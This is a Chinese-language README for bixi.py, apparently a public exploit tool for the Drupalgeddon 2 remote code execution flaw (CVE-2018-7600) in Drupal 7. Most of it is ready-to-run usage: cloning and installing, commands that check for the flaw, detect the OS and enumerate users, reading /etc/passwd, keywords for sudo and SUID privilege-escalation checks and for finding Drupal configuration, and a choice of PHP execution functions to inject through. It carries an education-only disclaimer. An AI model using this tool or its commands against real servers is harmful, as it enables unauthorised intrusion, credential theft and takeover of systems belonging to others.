bixi.pybixi.py 是一个针对 CVE‑2018‑7600 (Drupalgeddon 2) 漏洞的利用工具,该漏洞影响 Drupal 7。
它通过直观的界面和预定义命令,实现对易受攻击的 Drupal 服务器的远程命令执行 (RCE)。
本软件仅用于受控环境下的教育和研究目的。
"能力越大,责任越大"
system、passthru、exec、shell_exec)git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
cd Drupalgeddon2-CVE-2018-7600
# Kali / Debian / Ubuntu
sudo apt update
sudo apt install python3 python3-pip -y
pip3 install requests
# 其他发行版
pip3 install requests
chmod +x bixi.py
python3 bixi.py --help
python3 bixi.py <URL> <命令/关键词> [注入类型]
# 检查漏洞
python3 bixi.py http://10.99.99.6/drupal/ test
# 检测操作系统
python3 bixi.py http://10.99.99.6/drupal/ linux
python3 bixi.py http://10.99.99.6/drupal/ windows
# 枚举用户
python3 bixi.py http://10.99.99.6/drupal/ users_linux
python3 bixi.py http://10.99.99.6/drupal/ net_user
# 系统信息
python3 bixi.py http://10.99.99.6/drupal/ ifconfig
python3 bixi.py http://10.99.99.6/drupal/ ipconfig
# 自定义命令
python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"
| 命令 | 描述 |
|---|---|
| linux | 系统信息 |
| users_linux | 列出用户 |
| id | 用户/组信息 |
| ls | 列出文件 |
| ifconfig | 网络信息 |
| find_flag | 查找标志文件 |
| 命令 | 描述 |
|---|---|
| windows | 系统信息 |
| net_user | 列出用户 |
| whoami_win | 详细信息 |
| ipconfig | 网络信息 |
| netstat_win | 连接信息 |
| dir | 列出目录 |
| 命令 | 描述 |
|---|---|
| sudo | 检查 sudo 权限 |
| suid | 查找 SUID 二进制文件 |
| net_localgroup | 本地组 |
| drupal_config | 查找 Drupal 配置 |
| drupal_version | 获取 Drupal 版本 |
# system(默认)
python3 bixi.py http://target/ "whoami" system
# passthru
python3 bixi.py http://target/ "whoami" passthru
# exec
python3 bixi.py http://target/ "whoami" exec
# shell_exec
python3 bixi.py http://target/ "whoami" shell_exec
drupalgeddon2-exploit/
│
├── bixi.py
├── README.md
├── requirements.txt
├── examples/
│ ├── linux_commands.txt
│ └── windows_commands.txt
└── screenshots/
├── help_screen.png
└── exploit_success.png
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
修改默认超时值(15 秒):
timeout=15
编辑 get_command_for_keyword() 中的 commands 字典
pip3 install requests
# 检查连通性
ping TARGET_IP
# 检查 Drupal 路径
curl http://TARGET_IP/drupal/